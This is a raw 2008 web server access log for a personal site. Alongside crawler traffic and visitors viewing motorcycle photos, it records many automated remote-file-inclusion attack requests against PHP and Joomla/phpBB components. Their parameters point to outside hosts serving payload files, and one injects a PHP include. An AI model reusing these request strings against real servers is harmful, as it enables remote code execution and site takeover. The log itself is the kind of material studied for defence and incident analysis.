69.61.106.55 - - [19/Aug/2008:11:27:43 -0700] "GET /plugins/safehtml/safehtml.php?dir[plugins]=http://fdp.de/vorschaltseite/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:27:45 -0700] "GET /bikes/dteel/2008_01_27/?N=D HTTP/1.0" 200 5034 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:27:53 -0700] "GET /logs/access_080804.log/errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.13.225.31 - - [19/Aug/2008:11:27:53 -0700] "GET /errors.php?error=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
219.117.239.114 - - [19/Aug/2008:11:28:34 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
219.117.239.114 - - [19/Aug/2008:11:28:35 -0700] "GET //index.php?DOCUMENT_ROOT=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 200 9893 "-" "libwww-perl/5.65" "www.dmulk.com"
195.93.21.36 - - [19/Aug/2008:11:28:46 -0700] "GET /bikes/dteel/2008_01_26/IMG_4346M.JPG HTTP/1.1" 200 75886 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.37 - - [19/Aug/2008:11:28:46 -0700] "GET /bikes/dteel/2008_01_26/IMG_4338M.JPG HTTP/1.1" 200 76584 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.37 - - [19/Aug/2008:11:28:46 -0700] "GET /bikes/dteel/2008_01_26/IMG_4347M.JPG HTTP/1.1" 200 93210 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.39 - - [19/Aug/2008:11:28:47 -0700] "GET /bikes/dteel/2008_01_26/IMG_4349M.JPG HTTP/1.1" 200 73896 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.37 - - [19/Aug/2008:11:28:48 -0700] "GET /bikes/dteel/2008_01_26/IMG_4356M.JPG HTTP/1.1" 200 85422 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.71 - - [19/Aug/2008:11:28:49 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 200 108624 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.101 - - [19/Aug/2008:11:28:49 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4359M.JPG HTTP/1.1" 200 106754 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.73 - - [19/Aug/2008:11:28:49 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 200 102833 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.97 - - [19/Aug/2008:11:28:49 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 200 94330 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.35 - - [19/Aug/2008:11:28:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 200 105802 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.99 - - [19/Aug/2008:11:28:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 200 86979 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.100 - - [19/Aug/2008:11:28:51 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 200 83489 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.102 - - [19/Aug/2008:11:28:52 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 200 102059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.35 - - [19/Aug/2008:11:28:53 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4374M.JPG HTTP/1.1" 200 114637 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.99 - - [19/Aug/2008:11:28:53 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4375M.JPG HTTP/1.1" 200 85908 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.100 - - [19/Aug/2008:11:28:53 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 200 78015 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.101 - - [19/Aug/2008:11:28:54 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 200 87820 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.102 - - [19/Aug/2008:11:28:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 200 87412 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.103 - - [19/Aug/2008:11:28:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 200 84804 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.73 - - [19/Aug/2008:11:28:55 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4380M.JPG HTTP/1.1" 200 83650 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:28:56 -0700] "GET /logs/access_080308.log//codebb/pass_code.php?phpbb_root_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:28:56 -0700] "GET //codebb/pass_code.php?phpbb_root_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.93.21.74 - - [19/Aug/2008:11:28:56 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4381M.JPG HTTP/1.1" 200 98779 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:28:56 -0700] "GET /logs//codebb/pass_code.php?phpbb_root_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.93.21.97 - - [19/Aug/2008:11:28:57 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4382M.JPG HTTP/1.1" 200 88270 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.35 - - [19/Aug/2008:11:28:57 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4383M.JPG HTTP/1.1" 200 88967 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.99 - - [19/Aug/2008:11:28:57 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4384M.JPG HTTP/1.1" 200 96561 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.100 - - [19/Aug/2008:11:28:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4385M.JPG HTTP/1.1" 200 94524 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.101 - - [19/Aug/2008:11:28:58 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4386M.JPG HTTP/1.1" 200 70821 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
195.93.21.102 - - [19/Aug/2008:11:28:59 -0700] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 200 63059 "http://www.st-owners.com/forums/showthread.php?t=32353" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:29:11 -0700] "GET /logs/access_080214.log//codebb/pass_code.php?phpbb_root_path=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:29:24 -0700] "GET /logs/access_080731.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.117.239.114 - - [19/Aug/2008:11:29:45 -0700] "GET /logs/access_080808.log//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://septimamaipu.cl/septima/mambots/idps.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:29:49 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:29:49 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://c0d3d57.t35.com/ids.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:29:51 -0700] "GET /bikes/dteel/2008_02_08/?N=D HTTP/1.0" 200 1116 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
151.11.24.250 - - [19/Aug/2008:11:30:09 -0700] "GET /logs/access_080808.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://c0d3d57.t35.com/ids.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:30:13 -0700] "GET /logs/access_080713.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.84.19.133 - - [19/Aug/2008:11:30:14 -0700] "GET /logs/access_080606.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:18 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:18 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:18 -0700] "GET /logs/access_080324.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:19 -0700] "GET /logs/access_080131.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:30:25 -0700] "GET /logs/access_080215.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:30:25 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.130.79.130 - - [19/Aug/2008:11:30:26 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 200 10047 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:28 -0700] "GET /logs/access_080324.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:29 -0700] "GET /logs/access_080131.log/admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:29 -0700] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.51.194 - - [19/Aug/2008:11:30:29 -0700] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://www.teampaulc.org/modules/Forums/admin/lajelid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.93.21.71 - - [19/Aug/2008:11:30:33 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/IMG_4722M.JPG HTTP/1.1" 200 92405 "http://www.st-owners.com/forums/showthread.php?t=32353&page=9" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; FunWebProducts; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 1.1.4322; InfoPath.1; SpamBlockerUtility 4.8.4)" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:30:49 -0700] "GET /logs/home.php?content=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:30:49 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.189.211.14 - - [19/Aug/2008:11:30:51 -0700] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://anakdompu.by.ru/special/id.txt? HTTP/1.1" 200 9920 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:11:30:51 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.64.51.36 - - [19/Aug/2008:11:30:51 -0700] "GET //skin/zero_vote/error.php?dir=http://gabifir.yourfreehosting.net/2? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.17.129.24 - - [19/Aug/2008:11:30:54 -0700] "GET /home.php?content=http://illeganza.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:30:55 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:30:55 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:30:56 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:30:56 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:30:57 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:30:57 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.249.67.201 - - [19/Aug/2008:11:31:16 -0700] "GET /blog/wp-content/plugins/nggallery/nggextractXML.php?gid=4 HTTP/1.1" 200 157653 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:31:42 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:31:43 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.6.22.125 - - [19/Aug/2008:11:31:46 -0700] "GET /logs/access_080507.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:31:49 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:31:49 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:31:56 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:31:57 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:32:00 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:32:06 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:32:06 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:32:10 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.69.246.191 - - [19/Aug/2008:11:32:17 -0700] "GET /logs/access_080510.log//administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://x-foto.info/images/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:33:23 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.212.186.26 - - [19/Aug/2008:11:33:57 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:33:58 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:33:59 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:33:59 -0700] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:34:00 -0700] "GET /logs/access_080805.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.86.229.242 - - [19/Aug/2008:11:34:00 -0700] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://unbeatableshop.co.uk/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
